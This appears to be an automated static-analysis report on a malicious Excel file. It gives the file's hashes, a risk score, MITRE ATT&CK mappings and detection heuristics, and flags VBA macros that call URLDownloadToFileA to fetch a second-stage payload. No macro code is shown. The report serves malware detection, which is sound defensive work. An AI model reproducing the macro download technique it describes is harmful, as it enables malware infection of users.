Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 5c6c0c5a94f60a71…

MALICIOUS

Office (OLE) / .XLS

56.5 KB Created: 2021-03-29 13:21:49
MD5: 0801368e0e80ba88daad52d7e5977d22 SHA-1: e8e2c197939ca869e7c6d120b27f1dcd35e20342 SHA-256: 5c6c0c5a94f60a71467c535e094d8a9e62e677115cf35b50683fe6bf5d716c29
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

This Excel file contains both Excel 4.0 macros and VBA macros. The VBA macros utilize the URLDownloadToFileA API, indicating an attempt to download and execute a second-stage payload from a remote source. The presence of both macro types suggests a multi-stage infection process.

Heuristics 4

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt
e686b98bb050ee154556e795c2a1702fc38d29774627593d0e77d5b6baa394c3		 xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 721 bytes
macros.bas
3db9897cbfe5c23523c7ee6e487c95266751174ddb6f1efae00d37e50a3cddfe		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 2860 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.